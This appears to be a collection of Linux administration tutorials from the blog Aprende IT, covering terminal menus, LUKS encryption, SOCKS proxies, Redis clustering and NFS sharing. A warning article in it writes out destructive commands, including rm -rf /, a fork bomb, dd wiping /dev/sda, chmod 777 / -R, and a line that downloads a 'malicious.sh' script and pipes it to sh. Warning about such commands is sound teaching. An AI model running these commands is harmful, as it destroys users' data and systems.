The entry Creating Interactive Scripts in Linux: Using Dialog or Whiptail was first published on Aprende IT.
Both Dialog and Whiptail are tools that allow creating simple and functional graphical interfaces within a text terminal. These tools are very useful for developing menus, dialog boxes, selection lists, progress bars, and much more. Throughout this article, we will guide you through the basic concepts and practical examples of both tools so that you can use them in your own scripts.
Dialog is a command-line tool used to generate interactive dialog boxes in text-based terminals. It is widely used in shell scripts to create interactive menus, confirmation boxes, forms, progress bars, among others. Dialog allows users to interact with a script through a text-based user interface, which is especially useful in server environments where a full graphical interface is not available.
To install Dialog on a Debian or Ubuntu-based distribution, simply run the following command:
sudo apt-get update
sudo apt-get install dialog
For Red Hat-based distributions like CentOS or Fedora:
sudo yum install dialog
This example shows a simple message box with only an “OK” button:
#!/bin/bash
dialog --title "Message" --msgbox "Hello, this is a simple message box." 6 50
Explanation: In this script, --title defines the dialog box title, --msgbox is the type of dialog used, and "6 50" are the dimensions of the box (6 lines high and 50 characters wide).
The following example creates a menu where the user can select an option:
#!/bin/bash
option=$(dialog --title "Main Menu" --menu "Select an option:" 15 50 4 \
    1 "Option 1" \
    2 "Option 2" \
    3 "Option 3" \
    4 "Exit" \
    3>&1 1>&2 2>&3)
clear
echo "You selected option: $option"
Explanation: The menu is displayed with numbered options. The redirection 3>&1 1>&2 2>&3 swaps standard output and standard error: dialog draws its interface on stdout and writes the user's selection to stderr, so swapping the two lets the command substitution capture the selection while the interface still reaches the terminal.
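The file-descriptor juggling is worth seeing in isolation. Here is a minimal sketch in plain bash (no dialog needed) showing what 3>&1 1>&2 2>&3 does inside a command substitution:

```shell
#!/bin/bash
# Inside the substitution: fd3 := old stdout (the capture pipe),
# fd1 := old stderr (the terminal), fd2 := fd3 (the capture pipe).
# So whatever the inner command writes to stderr ends up in the variable,
# which is exactly how the selection printed by dialog gets captured.
captured=$( { echo "shown on terminal"; echo "captured" >&2; } 3>&1 1>&2 2>&3 )
echo "captured: $captured"
```

Running this prints "shown on terminal" directly to the terminal (via the old stderr) while the variable receives the text written to stderr.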
In this example, the user can select one or more items from a list:
#!/bin/bash
options=$(dialog --title "Package Selection" --checklist "Select the packages you want to install:" 15 50 5 \
    1 "Apache" off \
    2 "MySQL" off \
    3 "PHP" off \
    4 "Python" off \
    5 "Java" off \
    3>&1 1>&2 2>&3)
clear
echo "Selected packages: $options"
Explanation: --checklist creates a list of items with checkboxes, where off indicates that the checkbox is unchecked by default.
Progress bars are useful for showing the progress of a task. Here’s an example:
#!/bin/bash
{
    for ((i = 0; i <= 100; i += 10)); do
        sleep 1
        echo $i
    done
} | dialog --title "Progress" --gauge "Installing..." 10 70 0
Explanation: --gauge is used to create a progress bar. The for loop simulates the progress of a task, increasing the bar by 10% every second.
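In a real script you would echo the percentage after each actual step instead of sleeping. A sketch of that pattern (the task names are placeholders); piping its output into dialog --gauge exactly as above would drive the bar:

```shell
#!/bin/bash
# Hypothetical task list; each completed step advances the bar proportionally.
tasks=("download" "extract" "configure" "install")
total=${#tasks[@]}
for i in "${!tasks[@]}"; do
    # ... run the real work for "${tasks[$i]}" here ...
    echo $(( (i + 1) * 100 / total ))   # percentage read by --gauge
done
```

With four tasks this emits 25, 50, 75, and 100 as each step finishes.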
Whiptail is a lightweight alternative to Dialog that also allows creating text-based interactive interfaces in shell scripts. Although Whiptail offers a similar set of features, it is especially useful in systems where Dialog is not available or where a lighter tool is preferred.
To install Whiptail on Debian, Ubuntu, and their derivatives:
sudo apt-get update
sudo apt-get install whiptail
In distributions like CentOS, Red Hat, and Fedora:
sudo yum install newt
As with Dialog, you can create a simple message box:
#!/bin/bash
whiptail --title "Message" --msgbox "This is a simple message using Whiptail." 8 45
Explanation: This example is similar to Dialog, but using Whiptail. The dimensions of the box are slightly different.
Creating interactive menus is easy with Whiptail:
#!/bin/bash
option=$(whiptail --title "Main Menu" --menu "Choose an option:" 15 50 4 \
    "1" "Option 1" \
    "2" "Option 2" \
    "3" "Option 3" \
    "4" "Exit" \
    3>&1 1>&2 2>&3)
clear
echo "You selected option: $option"
Explanation: This script works similarly to the Dialog example, allowing the user to select an option from a menu.
Whiptail also allows creating selection lists with checkboxes:
#!/bin/bash
options=$(whiptail --title "Package Selection" --checklist "Select the packages you want to install:" 15 50 5 \
    "Apache" "" ON \
    "MySQL" "" OFF \
    "PHP" "" OFF \
    "Python" "" OFF \
    "Java" "" OFF \
    3>&1 1>&2 2>&3)
clear
echo "Selected packages: $options"
Explanation: In this example, "ON" indicates that the checkbox is checked by default. Note that the Whiptail examples here write the state in uppercase (ON/OFF), while the Dialog example used lowercase (off).
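One detail worth knowing: --checklist returns the selected tags as a space-separated list of quoted strings, so the result usually needs a small parsing step. A sketch with simulated output (in a real script $options would come from the whiptail call via 3>&1 1>&2 2>&3):

```shell
#!/bin/bash
# Simulated checklist result; whiptail prints something like: "Apache" "PHP"
options='"Apache" "PHP"'
# Expand the quoted list into a proper bash array
eval "selected=($options)"
for pkg in "${selected[@]}"; do
    echo "Would install: $pkg"
done
```

This prints one "Would install: ..." line per selected package, with the quotes stripped.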
Finally, here’s an example of a progress bar with Whiptail:
#!/bin/bash
{
    for ((i = 0; i <= 100; i += 10)); do
        sleep 1
        echo $i
    done
} | whiptail --gauge "Installing..." 6 50 0
Explanation: This example is very similar to Dialog, but using Whiptail’s syntax.
Both Dialog and Whiptail are powerful and flexible tools that allow system administrators and developers to create interactive user interfaces within a terminal. Although both tools are similar in functionality, the choice between one or the other may depend on the specific needs of the system and personal preferences.
Dialog is more popular and widely documented, while Whiptail is a lighter alternative that may be preferred in systems where minimizing resource usage is crucial.
In this article, we have covered the basics of Dialog and Whiptail with practical examples that will allow you to start creating your own interactive scripts. Whether you need a simple menu, a message box, or a progress bar, these tools will provide the necessary functionalities to improve user interaction with your scripts.
Remember that the key to mastering these tools is practice. Try the examples provided, modify them to suit your needs, and continue exploring the many possibilities that Dialog and Whiptail offer to make your scripts more intuitive and user-friendly.
Below are two example scripts of two interactive menus:
Dialog
#!/bin/bash
# Example of a menu using Dialog
dialog --menu "Select an option:" 15 50 4 \
    1 "View system information" \
    2 "Show disk usage" \
    3 "Configure network" \
    4 "Exit" 2>selection.txt

# Read the selected option
option=$(cat selection.txt)

case $option in
    1)
        echo "Showing system information..."
        # Corresponding commands would go here
        ;;
    2)
        echo "Showing disk usage..."
        # Corresponding commands would go here
        ;;
    3)
        echo "Configuring network..."
        # Corresponding commands would go here
        ;;
    4)
        echo "Exiting..."
        exit 0
        ;;
    *)
        echo "Invalid option."
        ;;
esac
Whiptail
#!/bin/bash
# Example of a menu using Whiptail
option=$(whiptail --title "Main Menu" --menu "Select an option:" 15 50 4 \
    "1" "View system information" \
    "2" "Show disk usage" \
    "3" "Configure network" \
    "4" "Exit" \
    3>&1 1>&2 2>&3)

# Verify the selected option
case $option in
    1)
        echo "Showing system information..."
        # Corresponding commands would go here
        ;;
    2)
        echo "Showing disk usage..."
        # Corresponding commands would go here
        ;;
    3)
        echo "Configuring network..."
        # Corresponding commands would go here
        ;;
    4)
        echo "Exiting..."
        exit 0
        ;;
    *)
        echo "Invalid option."
        ;;
esac
As you can see, the results are very similar.
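One detail both examples gloss over: dialog and whiptail also report how the box was closed through their exit status (0 for OK, 1 for Cancel, 255 for Esc). A sketch of the pattern with a simulated status (in a real script you would read $? immediately after the dialog or whiptail call):

```shell
#!/bin/bash
status=1   # simulated: pretend the user pressed Cancel
case $status in
    0)   echo "OK pressed" ;;
    1)   echo "Cancel pressed" ;;
    255) echo "Esc pressed" ;;
esac
```

Checking the exit status lets your script distinguish a deliberate "Exit" choice from the user backing out of the menu entirely.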
For Dialog and Whiptail, you can find extensive documentation at https://invisible-island.net/dialog/dialog.html
The entry Partition and Disk Encryption with LUKS on Linux was first published on Aprende IT.
Before diving into the world of encryption with LUKS, it is essential to ensure you have the appropriate tools installed on your system. Generally, most Linux distributions include these encryption tools by default, but it’s always good to verify.
You can install the necessary tools using your distribution’s package manager. In Debian-based distributions, like Ubuntu, you can run the following command in the terminal:
sudo apt install cryptsetup
If you are using a Red Hat-based distribution, like Fedora or CentOS, you can install the encryption tools with the following command:
sudo dnf install cryptsetup
Once you have installed cryptsetup, you will be ready to start working with LUKS.
The first step to encrypt a partition or disk on Linux is to create a LUKS volume. This volume will act as an encryption layer that protects the data stored on the partition or disk.
To create a LUKS volume, you will need to specify the partition or disk you want to encrypt. Make sure the partition is unmounted before proceeding. Suppose we want to encrypt the partition /dev/sdb1. The following command will create a LUKS volume on this partition:
sudo cryptsetup luksFormat /dev/sdb1
This command will initiate the process of creating the LUKS volume on the specified partition. You will be prompted to confirm this action, as the process will erase all existing data on the partition. After confirming, you will be asked to enter a password to unlock the LUKS volume in the future. Make sure to choose a secure password and remember it well, as you will need it every time you want to access the encrypted data.
Once the process is complete, you will have a LUKS volume created on the specified partition, ready to be used.
After creating a LUKS volume, the next step is to open it to access the data stored on it. To open a LUKS volume, you will need to specify the partition containing the volume and assign it a name.
sudo cryptsetup luksOpen /dev/sdb1 my_encrypted_partition
In this command, /dev/sdb1 is the partition containing the LUKS volume, and my_encrypted_partition is the name we are assigning to the opened volume. Once you run this command, you will be asked to enter the password you specified during the creation of the LUKS volume. After entering the correct password, the volume will open and be ready to be used.
To close the LUKS volume and block access to the encrypted data, you can use the following command:
sudo cryptsetup luksClose my_encrypted_partition
This command will close the LUKS volume with the specified name (my_encrypted_partition in this case), preventing access to the data stored on it until it is opened again.
Once you have opened a LUKS volume, you can create a file system on it to start storing data securely. You can use any Linux-compatible file system, such as xfs or btrfs.
Suppose we want to create an xfs file system on the opened LUKS volume (my_encrypted_partition). The following command will create an xfs file system on the volume:
sudo mkfs.xfs /dev/mapper/my_encrypted_partition
This command will format the opened LUKS volume with an xfs file system, allowing you to start storing data on it securely.
Once you have created a file system on a LUKS volume, you can mount it to the file system to access the data stored on it. To mount a LUKS volume, you can use the following command:
sudo mount /dev/mapper/my_encrypted_partition /mnt
In this command, /dev/mapper/my_encrypted_partition is the path to the block device representing the opened LUKS volume, and /mnt is the mount point where the file system will be mounted.
After mounting the LUKS volume, you can access the data stored on it as you would with any other file system mounted on Linux. When you have finished working with the data, you can unmount the LUKS volume using the following command:
sudo umount /mnt
This command will unmount the file system of the LUKS volume, preventing access to the data stored on it until it is mounted again.
LUKS provides several tools for managing volumes, including the ability to change the password, add additional keys, and backup the headers of the volumes.
To change the password of a LUKS volume, you can use the following command:
sudo cryptsetup luksChangeKey /dev/sdb1
This command will prompt you for the current password of the LUKS volume and then allow you to enter a new password.
If you want to add an additional key to the LUKS volume, you can use the following command:
sudo cryptsetup luksAddKey /dev/sdb1
This command will prompt you for the current password of the LUKS volume and then allow you to enter a new additional key.
To backup the header of a LUKS volume, you can use the following command:
sudo cryptsetup luksHeaderBackup /dev/sdb1 --header-backup-file backup_file
This command will backup the header of the LUKS volume to the specified file, allowing you to restore it with cryptsetup luksHeaderRestore /dev/sdb1 --header-backup-file backup_file in case the volume header is damaged.
In summary, the complete workflow looks like this:

sudo cryptsetup luksFormat /dev/DISK
sudo cryptsetup luksOpen /dev/DISK DECRYPTED_DISK
sudo mkfs.xfs /dev/mapper/DECRYPTED_DISK
sudo mount /dev/mapper/DECRYPTED_DISK /mount_point
Once you have encrypted a partition or disk using LUKS on Linux, you may want to configure the automatic opening of the LUKS container during system boot and mount it at a specific point in the file system. This can be achieved using the crypttab and fstab configuration files.
The crypttab file is used to configure the automatic mapping of encrypted devices during the system boot process. You can specify the encrypted devices and their corresponding encryption keys in this file.
To configure an encrypted device in crypttab, you first need to know the UUID (Universally Unique Identifier) of the LUKS container. You can find the UUID by running the following command:
sudo cryptsetup luksUUID /dev/sdb1
Once you have the UUID of the LUKS container, you can add an entry in the crypttab file to configure the automatic mapping. For example, suppose the UUID of the LUKS container is 12345678-1234-1234-1234-123456789abc. You can add the following entry to the crypttab file:
my_encrypted_partition UUID=12345678-1234-1234-1234-123456789abc none luks
It can also be done this way without using the UUID:
my_encrypted_partition /dev/sdb1 none luks
In this entry, my_encrypted_partition is the name we have given to the LUKS container, and UUID=12345678-1234-1234-1234-123456789abc is the UUID of the container. The word none indicates that no key file is used (the passphrase will be prompted when the device is activated), and luks specifies that the device is encrypted with LUKS.
Once you have configured the automatic mapping of the encrypted device in crypttab, you can configure the automatic mounting of the file system in fstab. The fstab file is used to configure the automatic mounting of file systems during system boot.
To configure the automatic mounting of a file system in fstab, you first need to know the mount point and the file system type of the LUKS container. Suppose the mount point is /mnt/my_partition and the file system is xfs. You can add an entry in the fstab file as follows:
/dev/mapper/my_encrypted_partition /mnt/my_partition xfs defaults 0 2
In this entry, /dev/mapper/my_encrypted_partition is the path to the block device representing the opened LUKS container, /mnt/my_partition is the mount point where the file system will be mounted, xfs is the file system type, defaults specifies the default mount options, and 0 2 specifies the file system check options.
In the case of a server, I would not leave crypttab active: I would keep the configuration in place but commented out, and do the same in fstab, performing the mounts manually after a reboot. This avoids having to use key files and prevents some of the issues they can cause.
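Assuming the names used throughout this article, that commented-out pair could look like this (a sketch; adjust the device, mapper name, and mount point to your system):

```
# /etc/crypttab — kept commented; the volume is opened manually after boot
#my_encrypted_partition  /dev/sdb1  none  luks

# /etc/fstab — likewise commented; mounted manually once the volume is open
#/dev/mapper/my_encrypted_partition  /mnt/my_partition  xfs  defaults  0  2
```

After a reboot you would run cryptsetup luksOpen and mount by hand, as shown earlier in the article.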
The entry Create SOCKS Proxy with Dante and OpenSSH was first published on Aprende IT.
In the digital era, maintaining online privacy and security is more crucial than ever. One way to protect your identity and data on the internet is through the use of a SOCKS proxy server. This type of proxy acts as an intermediary between your device and the internet, hiding your real IP address and encrypting your internet traffic. In this article, we will guide you step by step on how to set up your own SOCKS proxy server on Ubuntu using Dante, a versatile and high-performance proxy server.
Before diving into the Dante setup, it’s essential to prepare your system and ensure it is updated. To do this, open a terminal and run the following commands:
sudo apt update
sudo apt install dante-server
These commands will update your system’s package list and then install Dante, respectively.
Once Dante is installed, the next step is to configure the proxy server. This is done by editing the danted.conf configuration file located in /etc/. To do this, use your preferred text editor. Here, we will use vim:
sudo vim /etc/danted.conf
Inside this file, you must specify crucial details such as the external and internal interfaces, the authentication method, and access rules. Below, we show you an example configuration that you can adjust according to your needs:
logoutput: syslog
user.privileged: root
user.unprivileged: nobody

# The external interface (can be your public IP address or the interface name)
external: eth0

# The internal interface (usually your server's IP address or loopback)
internal: 0.0.0.0 port=1080

# Authentication method
socksmethod: username

# Access rules
client pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
    log: connect disconnect error
}

# Who can use this proxy
socks pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
    command: bind connect udpassociate
    log: connect disconnect error
    socksmethod: username
}
This configuration defines a SOCKS server that listens on all available interfaces (0.0.0.0) on port 1080. It uses username authentication and allows connections from and to any address.
For the proxy to be secure and not open to the public, it’s necessary to create a specific user for the connection. This is achieved with the following commands:
sudo useradd -r -s /bin/false username
sudo passwd username
Here, username is the username you wish for the proxy connection. The useradd command creates the user, and passwd allows you to assign a password.
With the user created and the configuration file adjusted, it’s time to restart the Dante service and ensure it runs at system startup:
sudo systemctl restart danted.service
sudo systemctl enable danted.service
sudo systemctl status danted.service
Furthermore, it’s important to ensure that port 1080, where the proxy listens, is allowed in the firewall:
sudo ufw allow 1080/tcp
Finally, to verify everything is working correctly, you can test the connection through the proxy with the following command:
curl -v -x socks5://username:password@your_server_ip:1080 https://whatismyip.com/
Remember to replace username, password, and your_server_ip with your specific information. This command will use your proxy server to access a website that shows your public IP address, thus verifying that traffic is indeed being redirected through the SOCKS proxy.
Setting up a SOCKS proxy server with Dante may seem complex at first, but by following these steps, you can have a powerful and flexible proxy system up and running.
You can configure a SOCKS5 proxy server using OpenSSH on Ubuntu 22.04, which is a simpler and more direct alternative in certain cases, especially for personal use or in situations where you already have an SSH server set up. Below, I explain how to do it:
Unlike Dante, which lets us create a proxy service with authentication, with OpenSSH we create a tunnel on a port that can be used as a SOCKS proxy without authentication, so it is advisable to expose it only on localhost within a single computer (we will explain this in more detail later).
If you don’t already have OpenSSH Server installed on your server that will act as the proxy, you can install it with the following command as long as it’s a Debian / Ubuntu-based distribution:
sudo apt update
sudo apt install openssh-server
Ensure the service is active and running correctly with:
sudo systemctl status ssh
By default, OpenSSH listens on port 22. You can adjust additional configurations by editing the /etc/ssh/sshd_config file, such as changing the port, restricting access to certain users, etc. If you make changes, remember to restart the SSH service:
sudo systemctl restart ssh
To configure an SSH tunnel that works as a SOCKS5 proxy, use the following command from your client (not on the server). This command establishes an SSH tunnel that listens locally on your machine on the specified port (for example, 1080) and redirects traffic through the SSH server:
ssh -D 1080 -C -q -N user@server_address
At this point, note that with the -D option you should specify only the port: binding to all interfaces exposes the port to the entire network and may allow other devices on the network to use this proxy without authenticating:
[ger@ger-pc ~]$ ssh -D 0.0.0.0:1081 root@192.168.54.100
If we check with the command ss or netstat, we can see that it is listening on all networks:
[ger@ger-pc ~]$ ss -putan | grep 1081
tcp  LISTEN  0  128  0.0.0.0:1081  0.0.0.0:*  users:(("ssh",pid=292405,fd=4))
[ger@ger-pc ~]$
However, if we connect by specifying only the port without 0.0.0.0 or without any IP, it will only do so on localhost:
[ger@ger-pc ~]$ ssh -D 1081 root@192.168.54.100
.......
[ger@ger-pc ~]$ ss -putan | grep 1081
tcp  LISTEN  0  128  127.0.0.1:1081  0.0.0.0:*  users:(("ssh",pid=292485,fd=5))
tcp  LISTEN  0  128  [::1]:1081      [::]:*     users:(("ssh",pid=292485,fd=4))
[ger@ger-pc ~]$
Now you can configure your browser or application to use the SOCKS5 proxy on localhost and port 1080. Each application has a different way of configuring this, so you will need to review the preferences or documentation of the application.
Automating the Connection (Optional):
If you need the tunnel to be established automatically at startup or without manual interaction, you may consider using a tool like autossh to keep the tunnel connection open and reconnect in case it drops.
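One way to do that (a sketch — the unit name, file path, and user@server_address are placeholders for your own setup) is a systemd user unit wrapping autossh:

```
# ~/.config/systemd/user/socks-tunnel.service
[Unit]
Description=Persistent SOCKS5 tunnel via autossh

[Service]
# -M 0 disables autossh's monitor port in favour of SSH's own keepalives
ExecStart=/usr/bin/autossh -M 0 -N -D 1080 \
    -o ServerAliveInterval=30 -o ServerAliveCountMax=3 user@server_address
Restart=always

[Install]
WantedBy=default.target
```

You would then enable it with systemctl --user enable --now socks-tunnel.service; key-based SSH authentication is assumed, since the unit cannot type a password.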
This is an effective way to establish a quick SOCKS5 proxy for a user or a few users, especially useful for bypassing network restrictions or securing your traffic on untrusted networks. The main advantage of this method is its simplicity and that it leverages existing SSH infrastructure without the need to configure additional software on the server.
The entry Commands you should not run in Linux was first published on Aprende IT.
We start with the infamous rm -rf / command, a statement that seems simple but hides destructive potential. This command deletes all system files, starting from the root (/). The -r modifier indicates that deletion should be recursive, that is, affect all files and directories contained in the specified directory, while -f forces deletion without asking for confirmation. Running this command as a superuser means saying goodbye to your operating system, your data, and any hope of easy recovery.
In short, be careful with executing recursive rm commands as we can delete more than we want:
This enigmatic command is an example of a fork bomb function. It defines a function called : that, when executed, calls itself twice, and each call is executed in the background. This causes a chain reaction, doubling processes indefinitely and consuming system resources until it hangs. It’s a denial of service attack against your own machine, pushing processing and memory capacity to the limit.
To better understand, :(){ :|: & };:
is the same as running:
bomb() { bomb | bomb & }; bomb
The dd command is a powerful tool used to convert and copy files at the block level. In the command dd if=/dev/zero of=/dev/sda, the if=/dev/zero part sets the input to a continuous stream of zeros, and of=/dev/sda designates the target device, usually the main hard drive. This command overwrites the entire disk with zeros, irreversibly erasing the operating system, programs, and user data. It is essential to understand the function of each part of the command before executing something as powerful as dd.
For example, consider the command:

wget http://example.com/malicious.sh -O- | sh
This command uses wget to download a script from an Internet address and executes it directly in the shell with sh. The danger lies in executing code without reviewing it, coming from an unreliable source. It could be a malicious script designed to damage your system or compromise your security. It is always vital to verify the content of scripts before executing them.
Modifying permissions with, for example, chmod 777 / -R can render your system unusable.
chmod changes the permissions of files and directories, and 777 grants full permissions (read, write, and execute) to all users. Applying this recursively (-R) to the root (/) removes any form of access control, exposing the system to serious security risks. Any user could modify any file, with potentially disastrous consequences.
Similar to the previous case, chown changes the owner and group of files and directories. Using nobody:nogroup assigns ownership to an unprivileged user and group; applied recursively from the root, it can leave the system in an inoperable state, as critical services and processes might lose access to the files necessary for their operation.
Moving files to /dev/null is equivalent to deleting them: /dev/null is not a directory but a character device that discards everything written to it. Applied to the user's home directory, this can result in the loss of all personal data, settings, and important files stored there.
The find command can be very dangerous, for example, if we execute the following command:
find / -name '*.jpg' -type f -delete
What happens is that find is a versatile tool for searching for files in the file system that meet certain criteria. This command searches for all .jpg files in the system and deletes them. Although it might seem useful for freeing up space, indiscriminately deleting files based only on their extension can result in the loss of important documents, memories, and resources.
The following command triggers the kernel's SysRq "crash" handler, causing an immediate kernel panic (writing to /proc/sys/kernel/panic, by contrast, only configures the reboot timeout after a panic):

echo c > /proc/sysrq-trigger
Causing a Kernel Panic error in Linux is comparable to the dreaded blue screen of death in Windows, debunking the belief that Linux is infallible. Through certain commands, like redirecting random data to critical system devices or directly manipulating memory, Linux can be forced into a kernel panic state, making the system unrecoverable without a reboot. These commands are highly risky and can result in data loss or system corruption.
Overwriting the hard drive in Linux, using commands that redirect the output of any Bash command directly to a disk device (such as /dev/sda), can result in total data loss. This process is irreversible and differs from formatting, as it involves writing raw data over the entire unit, making it unusable. It’s a highly dangerous action with no practical benefit in most contexts.
An example of this would be:
command1 > /dev/sda1
Exploring and experimenting with Linux can be a rewarding and educational experience. However, it’s crucial to do so with knowledge and caution. The commands discussed here represent only a fraction of what is possible (and potentially dangerous) in the terminal. The golden rule is simple: if you’re not sure what a command does, research before executing it. Protecting your system is protecting your work, your memories, and ultimately, your peace of mind.
The entry Performance Testing in Linux with UnixBench was first published on Aprende IT.
UnixBench is an open-source performance test suite designed for Unix and Linux systems. It is characterized by its ease of use and depth, allowing the performance of various system components to be measured.
The installation of UnixBench is simple and is carried out through a few commands in the terminal:
Clone the UnixBench repository:
git clone https://github.com/kdlucas/byte-unixbench.git
Access the UnixBench directory:
cd byte-unixbench/UnixBench
Compile and build UnixBench:
make
To launch your first test, follow these steps:
In the same UnixBench folder, execute:
./Run
This will start a series of tests that will evaluate different aspects of your system.
The results of UnixBench are presented in the form of scores and data, providing a clear idea of your system’s performance in areas such as CPU, memory, and disk operations.
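The final "System Benchmarks Index Score" that UnixBench prints is a geometric mean of the individual test indices. A sketch of that calculation in awk, using made-up index values (the scores below are invented, purely to show the arithmetic):

```shell
#!/bin/bash
# Geometric mean = exp(mean of the logarithms) of the per-test indices.
printf '%s\n' 523.1 410.7 1500.2 318.0 | awk '
    { s += log($1); n++ }
    END { printf "index: %.1f\n", exp(s / n) }'
```

The geometric mean keeps one unusually high score (like the 1500.2 above) from dominating the overall index the way an arithmetic mean would.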
UnixBench allows specific tests for different components. For example, to focus on the CPU:
./Run dhry2reg whetstone-double
UnixBench offers the flexibility to customize the tests. You can choose which tests to run and adapt them to your specific needs.
While the tests are running, it is useful to perform real-time monitoring of the system using tools such as top or htop.
In addition to the basic components, UnixBench can also evaluate your system’s network performance, a crucial aspect for servers or network-dependent environments.
UnixBench can be integrated with advanced system monitoring tools, providing a detailed analysis of system performance during tests.
After the tests, you can identify areas for improvement and start optimizing your system, adjusting configurations, updating hardware, or modifying the software environment.
The entry The hdparm Utility: Tune Your Disk was first published on Aprende IT.
Most Linux distributions already include hdparm. To start, open a terminal and run:
hdparm -I /dev/sda | more
This command will show you all the available information about your disk, including the model and firmware version.
To know the data transfer speed of your disk, use:
hdparm -t /dev/sda
Repeat the measurement several times to get an average. If you want to measure the raw speed of the disk, without the effect of the system buffer cache, use:

hdparm -t --direct /dev/sda

You can also specify an offset to test different areas of the disk:

hdparm -t --direct --offset 500 /dev/sda
To improve data transmission, hdparm allows you to adjust the number of sectors read at once with the command:
hdparm -m16 /dev/sda
This command configures the simultaneous reading of 16 sectors. Additionally, you can activate the “read-ahead” function with hdparm -a256 /dev/sda, which causes the disk to preemptively read 256 sectors.
With hdparm -c /dev/sda, you can check if your disk is operating in 32-bit mode, and force this mode with -c3. If your disk is noisy, you can reduce the noise by activating the “acoustic mode” with hdparm -M 128 /dev/sda, or maximize speed with hdparm -M 254 /dev/sda.
The command hdparm -W /dev/sda allows you to activate or deactivate the write cache, which can speed up data writing but at the risk of data loss in case of power cuts.
You can manage the disk’s power saving with hdparm -B255 /dev/sda to deactivate it, or use values between 1 and 254 for different levels of saving and performance. With hdparm -S 128 /dev/sda, you set the idle time before the disk enters sleep mode.
SSDs can accumulate residual data blocks. To clean them, use the script wiper.sh /dev/sda, but with caution, as it can lead to data loss.
For securely erasing an SSD, hdparm offers the “secure erase” function with
hdparm --user-master u --security-erase 123456 /dev/sdb
This process completely removes data, but requires caution as it can render the SSD unusable in some cases.
For IDE disks, it is important to check and configure DMA with hdparm -d1 /dev/hda to improve data transfer. If you encounter problems, deactivate it with hdparm -d0 /dev/hda.
To ensure that changes made with hdparm persist after restarting, you must add them to the system startup scripts or, in Debian-based systems, in the /etc/hdparm.conf file.
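On Debian-based systems, a fragment of /etc/hdparm.conf covering the settings discussed above might look like this (a sketch — the device and values are examples; check the commented template shipped in the file for the exact option names supported on your system):

```
/dev/sda {
    mult_sect_io = 16
    write_cache = on
    acoustic_management = 128
    apm = 128
    spindown_time = 128
}
```

These stanzas are applied automatically at boot, so the tuning survives restarts without custom startup scripts.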
Remember that this is a powerful tool and should be used with knowledge. Always make backups before making significant changes and consult specific documentation.
The entry How to Create a Redis Cluster: Step-by-Step Guide was first published on Aprende IT.
Before you begin, you need to have Redis installed on your system. You can download it from its official page. Once installed, verify its operation with the redis-server command. You should see a message indicating that Redis is functioning.
A Redis cluster is composed of several nodes. For this example, we’ll configure three nodes on the same machine to simplify things. Create three different directories, each representing a Redis node. In each directory, you’ll need a configuration file for the node. You can name it redis.conf.
Inside redis.conf, set the following configurations:
port [NODE_PORT]
cluster-enabled yes
cluster-config-file nodes.conf
cluster-node-timeout 5000
appendonly yes
Make sure to change [NODE_PORT] to a unique port for each node.
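As a sketch, the three per-node directories and configuration files can be generated in one loop. The ports 7000–7002 here are hypothetical; pick any free ports on your machine:

```shell
# Create one directory and one redis.conf per node (hypothetical ports 7000-7002)
for port in 7000 7001 7002; do
  mkdir -p "node-$port"
  cat > "node-$port/redis.conf" <<EOF
port $port
cluster-enabled yes
cluster-config-file nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF
done
```

Start each node from inside its own directory so that the generated nodes.conf files do not collide.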
Now, start each Redis node with its respective configuration. Open a terminal for each node and execute:
redis-server ./redis.conf
Creating the Cluster
With the nodes running, it’s time to form the cluster. Redis provides a tool called redis-cli for handling administrative tasks. Use it to create the cluster with the following command:
redis-cli --cluster create [NODE1_IP]:[PORT1] [NODE2_IP]:[PORT2] [NODE3_IP]:[PORT3] --cluster-replicas 1
Make sure to replace [NODE_IP] and [PORT] with the corresponding IP addresses and ports of your nodes. Note that --cluster-replicas 1 assigns one replica to each master, which requires six nodes in total; with only the three nodes from this example, use --cluster-replicas 0.
After creating the cluster, verify its status with:
redis-cli --cluster check [NODE_IP]:[PORT]
This command will give you a detailed report of the status of your cluster.
Now that you have your cluster, it’s important to know how to handle keys within it. Redis handles keys through a technique called sharding, where keys are distributed among the different nodes.
To insert a key, use:
redis-cli -c -p [PORT] SET [KEY_NAME] [VALUE]
To retrieve a key:
redis-cli -c -p [PORT] GET [KEY_NAME]
Remember that -c allows redis-cli to automatically redirect the command to the correct node.
It’s vital that you know how to handle situations when something goes wrong. In a Redis cluster, if a node fails, the system will automatically try to use a replica to maintain availability. However, it’s important to monitor the state of the cluster and perform regular maintenance.
To check the status of the nodes, use:
redis-cli -p [PORT] CLUSTER NODES
If a node has failed and you need to replace it, you can do so without stopping the cluster. Follow the initial configuration steps for a new node and then use it to replace the failed node with redis-cli.
As your application grows, you might need to scale your cluster. Redis allows you to add more nodes to the cluster without interruptions. To add a new node, set it up as we have seen before and then use it in the cluster with:
redis-cli --cluster add-node [NEW_NODE_IP]:[NEW_PORT] [EXISTING_NODE_IP]:[EXISTING_PORT]
Then, if necessary, you can rebalance the keys among the nodes.
Regular maintenance is crucial. Make sure to keep your Redis version up to date and to regularly check the logs. It’s also a good idea to set up a monitoring system to receive alerts about problems in the cluster.
I hope this guide has been helpful for you to create and manage your Redis cluster. As you’ve seen, with a few commands and some configuration, you can have a robust and scalable system. Remember, practice makes perfect, so don’t hesitate to experiment and learn more about this powerful system.
How to Set Up an NFS Server: Step-by-Step Guide for Ubuntu, Debian, and Red Hat-Based Distributions
Before diving deep into the configuration, it’s worth understanding what NFS is. It’s a protocol that lets Linux machines (and others like MacOS or UNIX systems) mount remote directories as if they were local. So, if you have several devices on your network, you can share files among them seamlessly with NFS. Cool, right?
If you’re running a business or simply have multiple machines at home, file sharing might be a daily task. Imagine if every time you wanted to share a file, you’d need to use a flash drive. Madness! That’s where NFS comes in, allowing you to share directories across multiple devices without a hitch.
We’ll start with Ubuntu and Debian, two of the friendliest distributions for Linux newcomers. Although the steps are quite similar, there’s always a slight variation worth noting.
First things first, always ensure your system is up-to-date. Open your terminal and run:
sudo apt update && sudo apt upgrade
In your terminal, install the packages we’ll need to set up the NFS server:
sudo apt install nfs-kernel-server
Suppose you want to share the directory /home/your_user/shared. First, you need to grant it the appropriate permissions:
sudo chown nobody:nogroup /home/your_user/shared
Then, modify the /etc/exports file to define which directories you want to share:
sudo nano /etc/exports
Add the following line:
/home/your_user/shared *(rw,sync,no_subtree_check)
With everything set, all that’s left is to start the service and make sure it runs at system boot:
sudo systemctl start nfs-kernel-server
sudo systemctl enable nfs-kernel-server
If you’re on the Red Hat side with distributions like CentOS, Rocky Linux, Alma Linux, or Fedora, the process is just as straightforward, with some slight differences.
